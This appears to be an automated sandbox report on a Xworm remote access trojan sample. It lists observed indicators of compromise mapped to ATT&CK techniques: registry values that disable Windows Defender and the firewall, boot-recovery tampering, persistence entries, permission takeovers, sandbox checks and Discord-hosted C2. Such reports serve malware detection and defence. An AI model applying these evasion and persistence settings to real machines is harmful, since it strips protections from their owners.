gurcu | 9fc53dcefce749b23c8f907dc44d498d15058a5b2cedb7c94e1cd42c88176c2f

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe

Modifies security service 2 TTPs 5 IoCs

Modify Registry

Windows Service

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4"	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Security	reg.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
5468	bcdedit.exe
6076	bcdedit.exe
5476	bcdedit.exe
2096	bcdedit.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 17 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1868	powershell.exe
4940	powershell.exe
240	powershell.exe
412	powershell.exe
5056	powershell.exe
2648	powershell.exe
6088	powershell.exe
4048	powershell.exe
5372	powershell.exe
3028	powershell.exe
5436	powershell.exe
5336	powershell.exe
4400	powershell.exe
2044	powershell.exe
2600	powershell.exe
2892	powershell.exe
3448	powershell.exe

Disables RegEdit via registry modification 1 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Disables Task Manager via registry modification
defense_evasion

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe

Manipulates Digital Signatures 1 TTPs 11 IoCs

Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\	reg.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

Windows Service

Disable or Modify System Firewall

T1562.004

pid	Process
3516	netsh.exe
6044	netsh.exe

Possible privilege escalation attempt 32 IoCs

exploit

pid	Process
2744	icacls.exe
2504	takeown.exe
6008	icacls.exe
5528	icacls.exe
6088	icacls.exe
5320	takeown.exe
2152	icacls.exe
2396	icacls.exe
6092	takeown.exe
5512	takeown.exe
2648	icacls.exe
3764	takeown.exe
5056	takeown.exe
5956	icacls.exe
3328	icacls.exe
5052	takeown.exe
1516	icacls.exe
3744	takeown.exe
4988	takeown.exe
4192	takeown.exe
4216	takeown.exe
4268	takeown.exe
3348	takeown.exe
1032	icacls.exe
3916	icacls.exe
6060	takeown.exe
1272	takeown.exe
2804	takeown.exe
6068	takeown.exe
5284	takeown.exe
5692	icacls.exe
4932	icacls.exe

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

Hidden Files and Directories

T1564.001

pid	Process
2112	attrib.exe
4316	attrib.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Control Panel\International\Geo\Nation	Rasauq Launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Control Panel\International\Geo\Nation	Rasauq SoftWorks.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Control Panel\International\Geo\Nation	sRasauq SoftWorks.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Control Panel\International\Geo\Nation	$77RealtekAudioDriverHost.exe

Drops startup file 6 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk	Rasauq SoftWorks.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk	Rasauq SoftWorks.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ModMenu.bat	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ModMenu.bat	cmd.exe

Executes dropped EXE 3 IoCs

pid	Process
3056	Rasauq SoftWorks.exe
2324	sRasauq SoftWorks.exe
1464	$77RealtekAudioDriverHost.exe

Modifies file permissions 1 TTPs 32 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2744	icacls.exe
4988	takeown.exe
4192	takeown.exe
2804	takeown.exe
1516	icacls.exe
2152	icacls.exe
1272	takeown.exe
3328	icacls.exe
5056	takeown.exe
5320	takeown.exe
2504	takeown.exe
3348	takeown.exe
5692	icacls.exe
4932	icacls.exe
6060	takeown.exe
3916	icacls.exe
6068	takeown.exe
5956	icacls.exe
6088	icacls.exe
1032	icacls.exe
2396	icacls.exe
4268	takeown.exe
3764	takeown.exe
5052	takeown.exe
5512	takeown.exe
2648	icacls.exe
4216	takeown.exe
6092	takeown.exe
3744	takeown.exe
6008	icacls.exe
5284	takeown.exe
5528	icacls.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RasauqRemover = "\"\""	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Service	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RasauqRemover = "\"\""	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Host Service = "C:\\Users\\Admin\\AppData\\Local\\Windows Host Service.scr"	Rasauq SoftWorks.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Service	reg.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
117	discord.com
118	discord.com

Power Settings 1 TTPs 12 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
2152	powercfg.exe
2440	powercfg.exe
4128	powercfg.exe
3024	powercfg.exe
5368	powercfg.exe
5944	powercfg.exe
3132	powercfg.exe
2532	powercfg.exe
1032	powercfg.exe
3936	powercfg.exe
308	powercfg.exe
4080	powercfg.exe

Drops file in System32 directory 8 IoCs

description	ioc	Process
File created	C:\Windows\System32\$666-RasauqBroker.bat	cmd.exe
File opened for modification	C:\Windows\System32\$666-RasauqBroker.bat	cmd.exe
File opened for modification	C:\Windows\System32\Rasauq\$77RasauqBroker.bat	cmd.exe
File opened for modification	C:\Windows\System32\Rasauq\$77RasauqBroker.bat	cmd.exe
File opened for modification	C:\Windows\system32\Recovery\ReAgent.xml	ReAgentc.exe
File opened for modification	C:\Windows\System32\$666-RasauqBroker.bat	cmd.exe
File created	C:\Windows\System32\Rasauq\$77RasauqBroker.bat	cmd.exe
File opened for modification	C:\Windows\system32\Recovery	ReAgentc.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

persistence privilege_escalation

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IMG_3728.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IMG_3728.png"	reg.exe

Drops file in Program Files directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Defender\MpClient.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MsMpCom.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ProtectionManagement.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\en-US\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpClient.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MsMpCom.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ProtectionManagement.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\en-US\ProtectionManagement.dll.mui	cmd.exe

Drops file in Windows directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	ReAgentc.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	ReAgentc.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	ReAgentc.exe
File opened for modification	C:\Windows\SystemTemp	msedge.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	ReAgentc.exe

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1720	sc.exe
3448	sc.exe
4880	sc.exe
856	sc.exe
5496	sc.exe
6064	sc.exe
2468	sc.exe
5416	sc.exe
5864	sc.exe
1308	sc.exe
4992	sc.exe
1096	sc.exe
4304	sc.exe
1172	sc.exe
2840	sc.exe
2724	sc.exe
4364	sc.exe
2976	sc.exe
3088	sc.exe
1260	sc.exe
2396	sc.exe
4056	sc.exe
3832	sc.exe
644	sc.exe
4436	sc.exe
3008	sc.exe
3588	sc.exe
6136	sc.exe
6044	sc.exe
1032	sc.exe
480	sc.exe
1988	sc.exe
3808	sc.exe
5028	sc.exe
2600	sc.exe
1712	sc.exe
5384	sc.exe
296	sc.exe
3104	sc.exe
4292	sc.exe
5576	sc.exe
2868	sc.exe
5140	sc.exe
3580	sc.exe
3924	sc.exe
3568	sc.exe
3012	sc.exe
60	sc.exe
3632	sc.exe
3704	sc.exe
4768	sc.exe
924	sc.exe
2372	sc.exe
5692	sc.exe
4164	sc.exe
1140	sc.exe
1656	sc.exe
4196	sc.exe
5076	sc.exe
3780	sc.exe
3004	sc.exe
3732	sc.exe
3452	sc.exe
4604	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceDesc	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	powercfg.exe
